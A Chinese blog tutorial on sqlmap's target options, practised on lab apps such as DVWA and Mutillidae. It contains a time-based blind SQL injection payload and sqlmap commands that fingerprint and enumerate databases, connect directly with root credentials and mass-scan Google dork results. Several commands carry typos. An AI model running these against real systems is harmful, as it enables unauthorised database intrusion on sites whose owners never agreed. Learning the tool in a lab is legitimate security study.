• sqlmap自动注入1(Target完整的超级详细 如有错误望指出)


    SQLmap的自动注入学习之路(1)

    是通过五种sql注入漏洞的检测技术

    ' and(select*from(select(sleep(20)))a)#

    这是基于时间的盲注检测 看他返回的时间 可以在DVWA试试

    sqlmap支持非常全面的()数据库管理系统DBMS

    -d 参数直接连接 作为客服端连上服务器端

    mysql 3306端口 orcle的1521   sqlsever的1433

    我们先来查看一下sqlmap的版本

    sqlmap.py --version

    sqlmap.py -h(看参数)
                   -hh(显示更详细的的参数)

     一Target(连接)

    Sqlmap 针对关系型数据库的自动化注入工具,如mysql,mssql,oracle

    由于DVWA需要cookie注入 所以我们换一个网站不需要登陆的网站

    sqlmap.py -u "http://1192.168.1.101/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p username -f

    -p是指定参数的注入 -f是指纹 这是最简单的扫描了

    sqlmap.py -u “” -username -dbs -a

    查看当前数据库的使用名 查看是否最高权限

    这是数据库名 然后表名 然后列名

    看这里就用了三种检测方法都可以注入

    -d

    sqlmap.py -d "mysql://root:toor@192.168.1.101:3306/dwva"

    直连数据库的操作

    -m也可以扫描list.txt文件 扫描txt里面的url

    sqlmap.py -m list.txt --dbs

    扫描google搜索结果

    如果你想扫描url里面含有.php?id=1都去尝试注入

    sqlmap.py -g "inurl:".php?id=1""

    加下划线是转义的因为让电脑知道这个“”就是双引号本身

    刚才上面的方法都是GET方法来检查传输的 所有的都是通过URL来进行传输的 如果是POST方法呐

    1使用http的请求文件(burpsuit)

    sqlmap.py -r request.txt(让他自己去http请求头里面找每一个参数进行注入)

    接下来我们演示一下

    复制下来 然后新建一个文本文件 post.txt然后把上面的内容粘贴进去

    sqlmap.py -r post.txt --dbs

    2使用burpsuit log文件

    sqlmap.py -l log.txt

    首先要配置一下我们访问过程中的log文件

    有很多种 这里为了方便我们选代理类型的文件 然后选择存放位置保存为Log.txt凡是我的访问都会被放到log.txt里面

    先识别到了一个url 1 然后问我们是否进行注入检测

    因为时间过长 我们对username进行检查-p username

    因为这里没有我们要的参数所以会报错

    HTTPS

     sqlmap -u "url" -force-ssl

    扫描配置文件

    sqlmap -c sqlmap.conf

    二Request

     切记(少就是多 慢就是快)

  • 相关阅读:
    由u盘安装Ubuntu引出的事件
    初试Ubuntu
    从error 中学习
    快手一面:牛客:字符串左移
    快手一面:Leetcode:最小栈
    十三、线程池
    十二、windows临界区、其他各种mutex互斥量
    十一、std::async深入
    LeetCode(703):找出数据流中的第K大元素
    LeetCode(1003):检查替换后的字符串
  • 原文地址:https://www.cnblogs.com/-zhong/p/10852151.html
Copyright © 2020-2023  润新知